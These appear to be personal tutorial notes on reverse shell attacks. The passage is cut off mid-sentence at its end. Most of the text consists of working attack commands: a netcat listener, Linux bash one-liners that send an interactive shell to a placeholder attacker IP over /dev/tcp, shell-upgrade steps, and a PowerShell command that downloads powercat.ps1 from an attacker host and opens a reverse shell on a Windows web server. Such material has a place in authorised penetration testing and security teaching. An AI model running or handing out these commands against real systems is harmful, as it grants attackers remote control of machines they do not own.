This part is mainly discussed about reverse shell attack.

Reverse shell attack is that attacker opens the port on its attack host, then the target host executes the malicious command to
connect to the port of the attack host actively.As attacker gets the shell of the target, then attacker can control and access the
resource of the target.

1.The command on the attack host:
nc -lvnp {port_number}

2.The malicious RCE command on the target:
2-1.Linux:
2-1-1./bin/bash -i>/dev/tcp/{Attacker_IP}/{Attacker_Port} 0<&1 2>&1
2-1-2./bin/bash -c '/bin/bash -i>/dev/tcp/{Attacker_IP}/{Attacker_Port} 0<&1 2>&1'

2-1-3.If attacker would like to get the shell of the target in half-crippled-tty mode, attacker could let the target do below command:
script -qc /bin/bash /dev/null
Although attacker gets the shell in half-crippled-tty mode, attacker may lost the target's shell as he clicks 'Ctrl+C'.So attacker
sometimes follow below resource guildlines to get the shell of the target in full-tty mode to avoid this situation.
https://hacktricks.xsx.tw/generic-methodologies-and-resources/shells/full-ttys
--------------------------------------------------------------------------------------------------------------------------------------
The example script for getting the shell in full-tty mode:
script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z
stty raw -echo; fg
export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset

(Attacker can use 'stty -a' to get the number of rows and columns.)
---------------------------------------------------------------------------------------------------------------------------------------

2-2.Windows:
2-2-1.https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

2-2-2.Kali-powercat.ps1:
If the target is web server, we could do LFi way to fulfill RCE attack.
Step1.First,we copy /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 to /home/kali in Kali.
Step2.After copying,we trigger HTTP shared service and pass this script to the target.
Step3.Then,we do below command on our browser client:
IEX (New-Object System.Net.Webclient).DownloadString("http://{Attack_IPv4}/powercat.ps1");powercat -c {Attacker_IPv4} -p {Reverse_shell_port} -e powershell 
Step4.Finally,we get the shell of the web server based on Windows.

2-2-3.We need to notice one thing:
The windows malicious RCE command is sometimes encoded with 'UTF-
